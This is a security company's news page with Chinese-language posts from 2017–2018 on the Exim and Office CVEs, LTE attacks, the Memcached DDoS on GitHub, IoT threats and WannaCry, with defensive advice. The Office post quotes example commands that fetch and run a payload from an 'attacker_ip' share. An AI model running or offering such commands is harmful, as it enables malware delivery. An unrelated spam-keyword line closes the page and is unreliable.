【四維創智】-專研智能,智匯安全-網絡攻防-滲透測試-web安全-無線安全-內網安全 行業資訊 – 第15頁 – 【四維創智】

                    四維資訊中心

                    關注最新行業動態,洞悉安全態勢,做行業領跑者!創造屬于我們自己的故事!

                    工信部宣布籌建全國區塊鏈和分布式記賬技術標準化技術委員會

                    近期,工業和信息化部信息化和軟件服務業司就籌建全國區塊鏈和分布式記賬技術標準化技術委員會事宜開展專題研究。
                     

                     
                    目前,國際標準化組織(ISO)、國際電信聯盟(ITU)、萬維網聯盟(W3C)等國際標準化機構紛紛啟動區塊鏈標準化工作。ISO成立了專注于區塊鏈領域的技術委員會TC 307(區塊鏈與分布式記賬技術技術委員會),開展基礎、身份認證、智能合約等重點方向的標準化工作。我國以參與國(P成員)身份參加相關標準化活動,取得了積極進展。
                     
                    為盡快推動形成完備的區塊鏈標準體系,做好ISO/TC 307技術對口工作,部信息化和軟件服務業司指導中國電子技術標準化研究院提出全國區塊鏈和分布式記賬技術標準化技術委員會組建方案。下一步,部信息化和軟件服務業司將積極推動相關工作,加快推動標委會成立,更好的服務區塊鏈技術產業發展.
                     
                    (文章原標題:信息化和軟件服務業司研究籌建全國區塊鏈和分布式記賬技術標準化技術委員會)

                    3月 13,2018 by admin

                    兩會談【企業信息安全】

                    互聯網技術快速發展的時代,企業辦公和人們生活享受互聯網帶來便利的同時,越來越多的信息安全問題開始逐漸顯露在我們眼前。近幾年由于企業或者個人泄露信息引起的違法犯罪問題日漸增多,大家熟悉、甚至親身經歷過的電信詐騙、郵件詐騙、恐嚇短信詐騙、二維碼詐騙等等。兩會上據穆可發介紹,近年來,網絡詐騙數量急劇攀升,其中至少一半以上都是精準作案,凸顯當前公民個人信息失密、信息安全得不到有效保護的嚴峻形勢。
                     

                    在企業管理層面,企業保護用戶信息安全的責任也亟待強化落實。穆可發指出,我國的大部分相關企業無論是從責任意識,還是技術防范方面都沒有按規定落實安全管理措施和技術保護措施,“尤其是諸如金融、通信、交通、教育、醫療等重點領域的部分企業都未承擔起對用戶個人信息的安全管理責任,對于相關企業網絡設施存在的安全隱患,目前的行業監管嚴重缺位?!睘榇?,他建議強化各類涉及“互聯網+”運營企業行業自律意識,健全企業內部網絡管理規章制度,對過失或故意泄露個人信息,管理者予以嚴格追究。
                     

                    然而無論是制度體系的確立或是專業人才的培養,都是需要大量時間的,短時間內恐改善有限。企業若想在短時間內提升信息安全保障程度,市場上一些為各種企業定制的安全解決方案就成為了一項選擇。
                     
                    多數企業在網絡層面的信息安全重視程度已經相對較高,四維創智安全運維管理平臺(獵鷹)是面向大型企事業單位,幫助企業安全人員進行資產安全管理、風險預警、安全事件管理以及應急響應的安全運維平臺。獵鷹安全運維平臺融合了資產管理、威脅感知和威脅管理。以資產為核心,以安全事件管理為關鍵流程,建立一套資產安全運維模型。通過可視化展示、高度自動化的資產收集和威脅發現流程,幫助安全人員、運維人員從繁復的安全檢測中提升效率,提升整體的資產安全運維水平。
                     
                    企業信息安全問題目前已經和企業當初進入互聯網模式一樣迫切,對其的關注度勢必將會越來越高,企業在信息安全方面自然不能落后。與其被動等待相關的規定落地,不如先行一步,提前建立一套適合的企業信息安全體系,杜絕企業信息安全隱患。

                    3月 12,2018 by admin

                    Linux郵件傳輸代理Exim緩沖區溢出漏洞 (CVE-2018-6789)

                    綜述
                    Linux的郵件傳輸代理Exim被曝出存在一個漏洞(CVE-2018-6789)。該漏洞源于base64解碼函數中的一個緩沖區溢出問題。常規下base64編碼后的字符串的長度為4的倍數,但是有可能在傳輸或者惡意構造的情況下導致長度不為4的倍數,致使長度計算錯誤。通過該漏洞,攻擊者可以繞過防護機制在受影響的應用程序上下文中執行任意代碼。若攻擊嘗試失敗仍可導致拒絕服務條件。

                    全球Exim用量超過百萬級,該漏洞影響Exim發行以來所有版本,建議受影響的用戶立即升級進行防護。

                    3月 9,2018 by admin

                    4G現漏洞 可窺探信息跟蹤用戶發送虛假警報

                    近日,安全研究人員發現了一批新型網絡攻擊,利用4G LTE網絡協議中的漏洞,進行包括監視呼叫和信息、設備脫機、虛假信息的編造,還可以監聽用戶和地址追蹤等10種攻擊。不僅如此,任何人都可以利用常見設備和開源4G LTE協議軟件發起上述這些攻擊。
                     
                    據悉,研究人員使用了一種名為LTEInspector的測試方法進行實驗,并在美國四大運營商網絡中確認了8種,當中受到攻擊的大部分原因在于協議信息中缺少適當的認證,加密和重播保護。
                     
                    以最常見的中繼攻擊為例,它能夠讓攻擊者冒充受害者的電話號碼連接到網絡,或在核心網絡中追蹤受害者設備的位置,從而在刑事調查期間設置虛假的不在場信息或種植假證據。
                     
                    在5G正在部署的當下階段,我們也應當注意本次發現的 4G 問題:漏洞是出現在 LTE 協議之中,這意味著該漏洞可能會波及到整個行業。

                     

                    漏洞對于用戶設備能夠影響到的環節是:

                     

                    1. 連接環節 :即將用戶設備與網絡相關聯的過程(例如,用戶打開手機)

                     

                    2. 分離環節:用戶關閉設備,網絡會與設備斷開連接的過程(又如,由于信號質量差無法進行網絡驗證)

                     

                    3. 尋呼環節: 本環節本是建立呼叫的一部分,通常用于強制設備重新獲取系統信息,并用于緊急警報

                     

                    研究員在其論文中 論文 (PDF) 中描述了一款名為 LTEInspector 的漏洞攻擊工具,其中可以運行10種全新的攻擊方法。影響最大的是是中繼攻擊,他們可以重放驗證,讓攻擊者冒充受害者來接入網絡。這樣,即使該用戶在巴黎也可以將位置信息變成倫敦,形成完美的不在場證明。

                     

                    更讓人擔心的是,研究員在論文中也表達了對于漏洞修復可行性的懷疑:在現有協議的基礎上額外增加安全性能修復會很難實現。

                     

                    協議層攻擊

                     

                    針對連接環節的攻擊方法包括:偽造來自惡意設備的 attach_request 信息來阻止受害者的手機的連接; 通過惡意節點跟蹤用戶(使用security_mode_command指令進行“可跟蹤性攻擊”); 服務中斷攻擊,該攻擊注入惡意控制命令,也使用惡意節點(如Stingray)。

                     

                    而通過尋呼過程進行的攻擊可以耗盡受害者的電池,迫使目標設備重新連接到網絡中。針對分離協議的攻擊也需要受害者連接到惡意節點。

                     

                    進階工具: LTEInspector

                     

                    研究團隊發布的攻擊工具是 LTEInspector,他們將次視作一款模型檢查器和加密協議驗證的“偷懶”組合。LTEInspector 在使用時可以自動檢查進程和操作順序,進行消息構建和加密,以及進行其他富約束。

                     

                    LTEInspector 會對設備的以下屬性進行檢查:真實性/禁止假冒),可用性/防止拒絕服務,完整性/限制未授權,以及用戶敏感信息的保密性/防止活動分析。

                     

                    3月 7,2018 by admin

                    白宮報告:缺乏數據和投入不足是網絡不安全的主因

                    2月16日的白宮報告稱,2016年美國因網絡攻擊所致損失在570億美元到1090億美元之間,且如果情況惡化,美國整體經濟都會受其外溢效應的影響。

                    白宮經濟顧問委員會的一份報告試圖量化所謂的惡意網絡活動,這些惡意活動針對私營實體和公共機構實施,包括拒絕服務攻擊、數據泄露和知識產權及敏感財務及戰略信息盜取。
                     
                    報告警告了來自民族國家的惡意活動,并特別點出了俄羅斯、中國、伊朗和朝鮮。
                     
                    報告特別指出了針對所謂關鍵基礎設施的攻擊,比如交通、電網、通信系統、大壩和食品生產設施,對這些關鍵基礎設施的攻擊可能引發遠超目標受害者的重大外溢影響。
                     
                    報告稱:“如果某公司運營有關鍵基礎設施資產,對該公司的攻擊可造成對整個經濟的重大破壞?!?br />  
                    對金融和能源行業的網絡攻擊是關注的重點。
                     
                    “這些行業內部互聯,與其他產業相互倚賴,并且廣泛接入互聯網,所以遭受可致整個經濟受影響的災難性網絡攻擊的風險最大?!?br />  
                    該報告并未給出如何加強網絡安全的新建議,但指出了“數據不足”和“私營產業防御系統投入不足”是網絡安全情況不佳的主要原因。
                     
                    該報告的放出時間比較微妙,就在美國官員譴責俄羅斯是去年NotPetya勒索軟件攻擊主謀的一天之后。美國官員稱NotPetya就是俄羅斯政府用來動搖烏克蘭社會穩定的工具,但后來失去了控制,傷及美國、歐洲和其他地方的公司企業。
                     
                    報告稱俄羅斯、中國、朝鮮和其他民族國家“經常發起高級針對性攻擊”,尤其是在工業間諜方面。
                     
                    “如果有籌資需求,他們就會執行勒索軟件攻擊,進行網銀盜竊或電匯詐騙活動?!?br />  
                    但威脅也來自于“激進黑客主義者”或帶有政治目的的團體,以及犯罪團伙、企業競爭對手、公司內部人及“機會主義者”。
                     
                    作為老生常談,這份白宮報告有一次提及了加強數據共享有助挫敗網絡攻擊。
                     
                    “網絡安全領域受到數據不足的困擾,這很大程度上是因為公司企業極不情愿報告負面消息。如果以往數據泄露及網絡攻擊的相關數據能跨企業共享,網絡防御就能得到極大提升?!?/p>

                    3月 6,2018 by admin

                    GitHub 遭遇史上最大規模 DDoS 攻擊

                    據外媒 Wired 報道,美國東部時間本周三下午 12:15,知名代碼托管網站 GitHub 遭遇了史上最大規模的 DDoS 網絡攻擊,每秒 1.35 TB 的流量瞬間沖擊了這一開發者平臺。
                     

                    來自 DDoS 攻擊的實時流量

                     

                    盡管 GitHub 曾試圖反抗,但最終還是借助 DDoS 防御服務提供商 Akamai Prolexic 提供的幫助才得以艱難度過。Prolexic 接管了 GitHub 所有的信息流,通過清除和阻止惡意數據包迫使襲擊者停止了攻擊。Akamai 網絡安全副總裁 Josh Shau 表示,“我們是基于互聯網所見過的最大規模攻擊的五倍來建模的,以前從沒有遇到過這么大的流量”。

                     

                    作為全球最大的社交編程及代碼托管網站,GitHub 一直很受攻擊者的歡迎。2013 年 1 月 15 日,來自 12306 搶票插件用戶的大量訪問導致 GitHub 訪問大幅放緩。2015 年 3 月 26 日,攻擊者利用劫持百度 JS 文件、跨域 <img> 攻擊、DDoS 攻擊、TCP SYN 攻擊等方式持續狂轟 GitHub 達六天之久。然而本周三的猛攻,卻是 GitHub 有史以來面臨的最嚴重的 DDoS 攻擊事件。

                     

                    據悉,本次攻擊并非依賴于傳統的僵尸網絡,而是使用了 Memcached 服務器。該服務器的設計初衷是提升內部網絡的訪問速度,而且是不應該被暴露在互聯網中的,但是根據 Akamai 的調查,至少有超過 5 萬臺此類服務器連接到了服務器上,因此非常容易受到攻擊。犯罪分子可利用 Memcache 服務器通過非常少的計算資源發動超大規模的 DDoS 攻擊,該漏洞是由于 Memcache 開發人員對 UDP 協議支持方式不安全所導致的,黑客能通過它輕易實現“反射型 DDoS 攻擊”。

                     

                    那么什么是反射型 DDoS 攻擊?犯罪分子是如何利用 UDP 協議進行攻擊的?我們應該采取什么方式去減少它所帶來的危害?360CERT 昨日發布的 Memcrashed 預警公告進行了解答。

                     

                    事件背景

                    黑客利用 Memcache 協議,會發送大量帶有被害者 IP 地址的 UDP 數據包給放大?主機,然后放大?主機對偽造的 IP 地址源做出大量回應,形成分布式拒絕服務攻擊,從而形成 DDoS 反射。

                     

                    攻擊強度

                    根據 360netlab DDoSMon 監測結果顯示, 近期內 Memcrashed 事件攻擊情況不斷上升,且由于 Memcache 作為放大器的利用,近幾天攻擊事件開始陡增,影響極為廣泛。

                     

                    漏洞細節

                    關于 DDoS 放大:
                    作為攻擊者,需要偽造 IP,發送?量量偽造來源的請求。未采取 BCP38 的機房(firewallrules and uRPF);
                    作為反射服務?,需要滿足 2 個條件。第一,上面運行著容易放大的 UDP 協議,即使用設計不當的 UDP 服務,能夠滿足特定條件下,響應包遠遠大于請求包。第二,該協議或服務在互聯網上有一定的使用量,如 DNS、NTP 等基礎服務;
                    受害者一般是金融、游戲、政治等目標,或出于破壞、炫技等目的。
                     

                    關于 Memcrashed:
                    由于 Memcache 同時監聽 TCP 和 UDP,天然滿足反射 DDoS 條件;
                    Memcache 作為企業應用組建,其業務特性保證了具有較高上傳帶寬;
                    Memcache 不需要認證即可進行交互;
                    很多用戶在編譯安裝時,將服務錯誤監聽在 0.0.0.0,且未進行 iptables 規則配置或云安全租戶配置。

                     

                    攻擊流程:
                    掃描全網端口服務;
                    進行指紋識別,獲取未認證的 Memcache;
                    過濾所有可以反射的 UDP Memcache;
                    插入數據狀態進行反射。

                     

                    緩解措施

                    對于 Memcache 使用者:
                    Memcache 的用戶建議將服務放置于可信域內,有外網時不要監聽 0.0.0.0,有特殊需求可以設置 ACL 或者添加安全組;
                    為預防機器?掃描和 SSRF 等攻擊,修改 Memcache 默認監聽端口;
                    升級到最新版本的 Memcache,并且使用 SASL 設置密碼來進行權限控制。
                     

                    對于網絡層防御:
                    多個 ISP 已經對 UDP11211 進行限速;
                    打擊攻擊源,互聯網服務提供商應當禁止在網絡上執行 IP 欺騙;
                    ISP 應允許用戶使用 BGP flowspec 限制入站 UDP11211 的流量,以減輕大型 DRDoS 攻擊時的擁堵。

                    3月 2,2018 by admin

                    物聯網十大不得不防的安全威脅

                    弗雷斯特研究公司在其2018年物聯網預測中指出:“安全漏洞是部署物聯網解決方案的公司深為擔憂的一大問題――事實上,這也是在考慮部署物聯網解決方案的企業最關注的問題。然而,大多數公司并沒有始終如一地應對物聯網安全威脅,業務壓力壓倒了技術安全問題?!?br />
                    在消費者方面,物聯網安全風險可能還要大,因為個人常常未認識到潛在威脅、該如何對付這些威脅。安全廠商金雅拓(Gemalto)贊助的2017年物聯網安全現狀調查發現,接受調查的消費者中只有14%認為自己對物聯網安全有所了解。鑒于54%的調查對象平均擁有四個物聯網設備,這個數字尤其令人不安。

                    而那些物聯網安全威脅不僅僅是理論上的。黑客和網絡犯罪分子已經找到了危及許多物聯網設備和網絡的方法,專家表示得逞的攻擊可能會增加。弗雷斯特研究公司預測:“2018年,我們會看到更多與物聯網有關的攻擊……只不過它們在規模和影響方面會有增無減?!?br /> 2018年企業和消費者將面臨哪種類型的物聯網安全威脅?借鑒歷史經驗,以下是最有可能的10種攻擊。

                    1. 僵尸網絡和DDoS攻擊
                    許多人在2016年9月聽說Mirai僵尸網絡時才首次意識到物聯網安全威脅。據一些人估計,Mirai感染了約250萬個物聯網設備,包括打印機、路由器和聯網攝像頭。僵尸網絡的創建者用它來發動分布式拒絕服務(DDoS)攻擊,包括攻擊網絡安全博客KrebsonSecurity。實際上,攻擊者利用被Mirai感染的所有設備,企圖同時連接到目標網站,希望搞垮服務器,防止任何人訪問網站。
                    自Mirai首次見諸媒體以來,攻擊者已發動了其他物聯網僵尸網絡攻擊,包括Reaper和Hajime。專家表示,未來可能會有更多的此類攻擊。

                    2. 遠程拍錄
                    黑客有可能在主人毫不知情的情況下,黑入物聯網設備,拍錄主人的活動,公眾知道這一點還要感謝中央情報局(CIA),而不是感謝黑客。維基解密網站披露的文件表明,這個情報機構早就知道物聯網設備的眾多零日攻擊,但沒有透露這些漏洞,原因是希望利用這些漏洞秘密錄下會揭露美國敵人的活動的對話。除了Android和iOS智能手機的漏洞外,文件還提到了智能電視的漏洞。很顯然,犯罪分子也可能會利用這些漏洞實施不法勾當。

                    3. 垃圾郵件
                    2014年1月發生了有史以來已知針對物聯網設備的一起攻擊,攻陷了10多萬個聯網設備,包括電視機、路由器和至少一臺智能電冰箱,每天發送30萬封垃圾郵件。攻擊者從任何一個設備發送的消息也就10條,因而很難阻止或查明攻擊源頭。
                    這起早期的攻擊絕非最后一起。由于Linux.ProxyM物聯網僵尸網絡,去年秋天物聯網垃圾郵件攻擊繼續肆虐。


                    4. APT
                    近年來,高級持續性威脅(APT)已經成為安全專業人員關注的一大問題。APT的背后是一群本領高超的攻擊者,比如國家或企業,它們發動復雜的網絡攻擊,難以預防或對付。比如說,摧毀伊朗核離心機的Stuxnet蠕蟲和2014年索尼影業黑客事件就歸咎于敵對國家。
                    隨著更多的關鍵基礎設施接入互聯網,許多專家警告,APT可能會對電網、工業控制系統或其他聯網系統發起物聯網攻擊。有人甚至警告,恐怖分子可能會發動使全球經濟陷于癱瘓的物聯網攻擊。

                    5. 勒索軟件
                    勒索軟件在家用PC和企業網絡上已變得非常普遍?,F在專家表示,勒索軟件攻擊者開始盯上智能設備只是個時間問題。安全研究人員已經演示了能夠將勒索軟件安裝到智能恒溫器上。比如說,他們可以將溫度調高到95度,拒絕調回到正常溫度,除非受害者同意支付用比特幣支付的贖金。他們還能夠對聯網的車庫門、車輛甚至家電發動類似的攻擊。早上你肯付多少贖金來解鎖自己的智能咖啡壺?

                    6. 數據竊取
                    獲取敏感數據仍然是網絡攻擊的主要目標之一,比如客戶名稱、信用卡號碼、社會保障號碼及其他個人身份信息。據波耐蒙研究所聲稱,數據泄露事件讓公司平均損失362萬美元,相當于每條被竊取的記錄141美元。在想方設法入侵企業網絡或家庭網絡的犯罪分子看來,物聯網設備就是一條全新的攻擊途徑。比如說,如果一個保護不當的物聯網設備或傳感器連接到企業網絡,這可能為攻擊者提供了進入網絡的新方法,有可能找到他們覬覦的寶貴數據。


                    7. 入侵住宅
                    隨著智能鎖和智能車庫開門器變得更常見,網絡犯罪分子也更有可能成為現實世界中的小偷。面對手頭擁有高級工具和軟件的犯罪分子,如果沒有得到妥善的保護,家庭系統可能岌岌可危。令人不安的是,安全研究人員已證明,很容易黑入幾家不同廠商的智能鎖,智能車庫門的安全性似乎并沒有大大提高。

                    8. 偷偷與孩子溝通
                    物聯網安全最令人不安的故事之一就是黑入嬰兒監視器。一對夫婦曾發現,一個陌生人不僅用他們的嬰兒監視器窺視其三歲大的兒子,還一直通過監視器與孩子說話。這位母親曾聽到陌生的聲音說:“醒來,小男孩,爸爸在找你”,孩子說他嚇壞了,因為有人在晚上通過監視器與他說話。
                    隨著更多的兒童設備和玩具連接到互聯網,這種可怕的情景可能會變得更司空見慣。

                    9. 遙控車輛
                    由于車輛變得更智能,并連接到互聯網,它們也容易受到攻擊。黑客已證明,他們可以控制吉普車,將空調設到最高數值、換廣播電臺、開啟雨刷器,最終讓車輛停下來。這個新聞導致車企召回了140萬輛車,但是這個漏洞背后的白帽研究人員表示,他們發現了另外的安全漏洞,克萊斯勒為召回車輛所打的補丁堵不了這些漏洞。雖然專家表示,汽車業在確保車輛安全方面有所改進,但幾乎可以肯定的是,攻擊者會在聯網汽車中發現新的漏洞。


                    10. 人體攻擊
                    有時候物聯網不僅僅包含物件,還包括聯網醫療設備植入到體內的人。電視連續劇《Homeland》的劇集圍繞利用植入體內的醫療設備搞暗殺活動展開,美國前副總統Dick Cheney對于這種場景深為擔憂,于是他關閉了植入其體內的除顫器的無線功能。這種類型的攻擊在現實生活中還沒有發生,但隨著更多的醫療設備成為物聯網的一部分,這種可能性仍然存在。

                    3月 1,2018 by admin

                    【緊急事件】比特幣勒索病毒事件持續升溫,啟動高危預警!

                    5月12日晚,wannacry(想哭)蠕蟲來襲,英國16家醫院遭到大范圍網絡攻擊,電腦被鎖定, 黑客索要每家醫院支付近400萬人民幣贖金,否則將刪除所有資料。目前比特幣病毒在全球蔓延,外網已經鬧得沸沸揚揚,國內也有部分高校反映教育網電腦大面積中了比特幣勒索病毒,致使許多實驗數據及畢業設計被鎖。但不僅僅是學生,磁盤文件會被病毒加密為.onion后綴,中毒后被要求支付贖金才能解密恢復文件,對個人資料造成嚴重損失。
                    據析,此次校園網勒索病正是基于2017年4月14日黑客組織Shadow Brokers(影子經紀人)公布的Equation Group(方程式組織)使用的漏洞軍火庫中所包含的漏洞利用程序EtenalBlue(永恒之藍)。它可遠程攻擊Windows的445端口(文件共享),如果系統沒有安裝今年3月的微軟補?。∕S17-010),無需用戶任何操作,只要開機上網,便能在電腦和服務器中執行任意代碼,植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機勒索病毒等惡意程序。
                    據百度安全分析,由于以前國內多次爆發利用445端口傳播的蠕蟲,運營商對個人用戶已封掉445端口,但是教育網并沒有此限制,仍然存在大量暴露445端口的機器,因此國內教育網是受攻擊的重災區,致使許多實驗數據及畢業設計被鎖。
                    日前,微軟已發布補丁MS17-010修復了攻擊的系統漏洞,請盡快為電腦安裝此補丁,提醒大家做好文件備份。
                    防護建議
                    四維創智提醒您,若已遭惡意程序攻擊,不要盲目繳納贖金。具體防護措施如下:
                    1.開啟系統防火墻->利用系統防火墻高級設置阻止向445端口進行連接->安裝相應系統安全更新。
                    2.建議學校在邊界出口或者網絡核心主干交換路由設備禁止外網對校園網135/137/138/139/445端口的連接。
                    3.及時升級操作系統到最新版本并做好重要文件的非本地備份是最行之有效的辦法。
                    4.日常提高防范意識,停止使用Windows XP、Windows 2003等微軟已不再提供安全更新的操作系統。
                    技術支持
                    四維創智安全團隊長期以來以”威脅感知“為核心,研發了系列安全產品,可對惡意軟件執行、未知威脅進行檢測和深入分析,及時抑制安全威脅的產生,有針對性的解決用戶安全問題。其中,獵鷹威脅感知平臺,集合威脅感知與威脅檢測技術,可主動對系統內所有主機進行風險探測,及時發現威脅并進行有效響應。

                    1月 15,2018 by admin

                    微軟Office曝潛伏17年之久的遠程代碼執行漏洞,可波及所有Office版本!

                    2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關注的莫過于在一個名為微軟公式編輯器的Office可執行文件中悄然發現了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破壞漏洞,影響目前流行的所有Office版本。攻擊者可以利用漏洞以當前登錄的用戶的身份執行任意命令。
                    漏洞信息
                    該漏洞由Embedi公司研究員發現,漏洞可導致遠程代碼執行、未授權認證繞過、無需用戶交互的遠程惡意程序植入。目前漏洞編號CVE-2017-11882,主要漏洞部件為Office中的自帶公式編輯器EQNEDT32.EXE。Microsoft公式編輯器默認安裝在Office套件中。該應用程序用于在Microsoft Word文檔中插入和編輯復雜方程作為對象鏈接和嵌入(OLE)項目。
                    Embedi的進一步分析表明,EQNEDT32.EXE是不安全的,因為執行時,它運行在Office之外,沒有受益于許多Microsoft Windows 10和Office安全特性,如Control Flow Guard。
                    Microsoft將CVE-2017-11882描述為Microsoft Office內存損壞漏洞。 “利用此漏洞需要用戶使用受影響的Microsoft Office或Microsoft WordPad軟件版本打開特制文件。在電子郵件攻擊情形中,攻擊者可以通過向用戶發送特制文件并說服用戶打開文件來利用此漏洞?!?br /> 漏洞技術分析
                    CVE-2017-11882漏洞POC樣本分析: http://www.freebuf.com/vuls/154462.html
                    可能的攻擊場景
                    Embedi研究者列舉了以下幾種該漏洞的可攻擊利用場景:當插入一些OLE(對象鏈接嵌入)實體時,可能會觸發該漏洞,實現一些惡意命令的執行,如向某個攻擊者架設網站下載執行惡意程序等。 最直接有效的漏洞利用方式就是,訪問攻擊者架設或控制的WebDAV服務器,并執行其中的運行程序。 不過,攻擊者還能利用該漏洞執行cmd.exe /c start \\attacker_ip\ff類似惡意命令,配合入侵或啟動WebClient服務。 另外,攻擊者還能使用諸如\\attacker_ip\ff\1.exe的命令向受害者系統中執行惡意程序,惡意程序的啟動機制與\\live.sysinternals.com\tools service方式類似。
                    緩解和修復措施
                    在11月的補丁修復周期中,微軟針對該漏洞修改了EQNEDT32.EXE組件的內存處理機制,并發布了多個漏洞補丁更新,強烈建議用戶及時進行下載更新。 除此之外,Embedi建議公司禁用EQNEDT32.EXE在Windows注冊表,以防止進一步利用。 研究人員寫道:“由于該組件具有許多安全問題,而且其中包含的漏洞可以被輕易利用,所以用戶確保安全的最佳選擇是禁止在Windows注冊表中注冊該組件。

                    1月 8,2018 by admin

                    物聯網安全 | 我們正在建造一個和世界一樣大小的機器人

                    是時候進行物聯網安全監管了。IBM彈性系統首席技術官Bruce Schneier表示,美國政府和全球其他國家政府已經開始監管物聯網(IoT)安全。
                    Schneier在SecTor安全會議的主題演講中發表了他的觀點。他指出,今天一切基本上都是電腦,不管是汽車,手表,電話還是電視機。物聯網今天有幾個部分,包括收集數據的傳感器,計算如何處理收集到的數據的計算能力,然后是影響現實世界的執行器。
                    Schneier說:“傳感器是互聯網的眼睛和耳朵,執行器是互聯網的手腳,中間的東西就是大腦。 “我們正在創造一個感知,思考和行動的互聯網,這是一個機器人的經典定義?!盨chneier說:“我們正在建造一個和世界一樣大小的機器人,大多數人甚至都沒有意識到這一點。
                    Schneier說:“可用性和完整性威脅對于現在的生命和財產來說是非常重要的。 “所以現在漏洞的后果是非常不同的,當黑客攻擊的時候,你的數據丟失了,黑客破壞了你的車,然后你就失去了生命?!?br /> Schneier認為,在物聯網的新世界中,許多現有的安全模式都失敗了。傳統的軟件公司和像蘋果和谷歌這樣的大型移動供應商擁有專門的安全團隊,而物聯網供應商并不總是這樣。因此,Schneier表示,物聯網設備往往不能很快修補,如果有漏洞的話。Schneier說:“家用DVR(數字視頻錄像機)本來可以成為Mirai僵尸網絡的一部分,可能大多數人只要設備工作就不會在意。 “保衛未來是很困難的,因為它不僅僅是在Windows上打補丁,而是讓它消失?!?br /> 施奈爾認為,網絡安全的挑戰不能單靠行業有效解決,反而主張政府參與協助規范技術安全。隨著互聯網連接設備進入受監管行業,Schneier預計,基本上沒有監管的計算機軟件將需要改變。新技術的使用也帶來了新的政府機構和法規的歷史先例。例如,汽車,飛機,廣播電視的出現,都導致政府機構和監管機構的出現。
                    Schneier說:“在20世紀,新技術一直導致新機構的形成?!笔┠螤栄a充說,市場無法自行解決的問題很多,因為市場通常是短期的利潤動機,無法解決集體行動問題。此外,Schneier表示,企業力量需要有一個反作用力的平衡?!罢俏覀內绾谓鉀Q這樣的問題的源頭和作用力”施奈爾說。
                    Schneier預計,關于連接技術法規將會出現很多需要討論和解決的問題,但他認為,確保網絡安全的安全并不比政府法規更好。這就是說,他強調,他在SecTor發言的原因是為了提高意識,讓網絡安全專業人士參與政府政策對話。
                    Schneier說:“作為技術專家,我們需要參與政策,因為物聯網帶來巨大的潛力和巨大的風險。 “隨著互聯網安全變成一切安全,所有的安全都有強大的技術組件?!彼f:“如果決策者弄錯了技術,我們永遠不會得到正確的政策?!?/p>

                    12月 14,2017 by admin
                    国产小视频精品_国产小视频网站_国产小视频在线播放